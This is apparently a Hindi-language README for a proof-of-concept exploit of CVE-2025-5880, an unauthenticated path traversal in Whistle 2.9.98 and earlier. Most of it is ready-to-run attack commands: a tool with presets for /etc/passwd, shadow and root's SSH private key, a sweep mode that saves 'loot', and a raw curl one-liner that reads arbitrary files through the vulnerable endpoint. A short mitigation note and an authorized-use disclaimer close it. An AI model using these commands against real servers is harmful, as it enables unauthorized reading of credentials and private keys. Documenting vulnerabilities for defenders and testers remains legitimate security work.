
Whistle v2.9.98 में एक अप्रमाणित पथ ट्रैवर्सल भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण।
| क्षेत्र | विवरण |
|---|
| CVE आईडी | CVE-2025-5880 |
| CWE | CWE-22 (पथ भ्रमण) |
| प्रभावित सॉफ़्टवेयर | Whistle ≤ 2.9.98 |
| प्रभावित एंडपॉइंट | /cgi-bin/sessions/get-temp-file |
| हमला वेक्टर | नेटवर्क — कोई प्रमाणीकरण आवश्यक नहीं |
| प्रभाव | होस्ट फ़ाइल सिस्टम पर मनमानी फ़ाइल पढ़ना |
filename क्वेरी पैरामीटर को डिस्क पर फ़ाइल खोलने से पहले सैनिटाइज़ नहीं किया जाता है, जिससे हमलावर इच्छित अस्थायी-फ़ाइल निर्देशिका से बच सकता है और Whistle प्रक्रिया की अनुमति वाली किसी भी फ़ाइल को पढ़ सकता है (जैसे /etc/passwd, /root/.ssh/id_rsa)।
# Clone
git clone https://github.com/YourHandle/CVE-2025-5880
cd CVE-2025-5880
# No external dependencies
python3 CVE-2025-5880.py -u http://TARGET:8899 --preset passwd
python3 CVE-2025-5880.py [-h] -u URL [-f FILE] [--preset PRESET]
[--sweep] [-o OUTPUT] [--save-dir DIR]
[--timeout N]
| फ़्लैग | विवरण |
|---|---|
-u / --url | लक्ष्य का आधार URL (जैसे http://192.168.1.10:8899) |
-f / --file | पढ़ने के लिए मनमाना फ़ाइल पथ |
--preset | नामित शॉर्टकट: passwd shadow hosts id_rsa … |
--sweep | स्वचालित रूप से सभी प्रीसेट्स पर पुनरावृति करें |
-o / --output | परिणाम को फ़ाइल में सहेजें |
--save-dir | --sweep से लूट डंप करने की निर्देशिका |
--timeout | HTTP टाइमआउट सेकंड में (डिफ़ॉल्ट 10) |
# /etc/passwd पढ़ें
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset passwd
# रूट की SSH निजी कुंजी प्राप्त करें
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset id_rsa -o id_rsa.pem
# एक मनमाना पथ पढ़ें
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 -f /proc/self/environ
# सभी प्रीसेट्स स्वीप करें और सहेजें
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --sweep --save-dir ./loot

# /etc/passwd
curl -s "http://TARGET:8899/cgi-bin/sessions/get-temp-file?filename=/etc/passwd" | jq -r '.value'
Whistle को एक ऐसे संस्करण में अपडेट करें जो filename पैरामीटर को इच्छित अस्थायी-फ़ाइल निर्देशिका तक सीमित करता है और मान्य करता है। सर्वर-साइड पर अनुमति सूची पथ सामान्यीकरण लागू करें (जैसे path.resolve + उपसर्ग जाँच)।
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।
ऐसी प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।
लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानता है।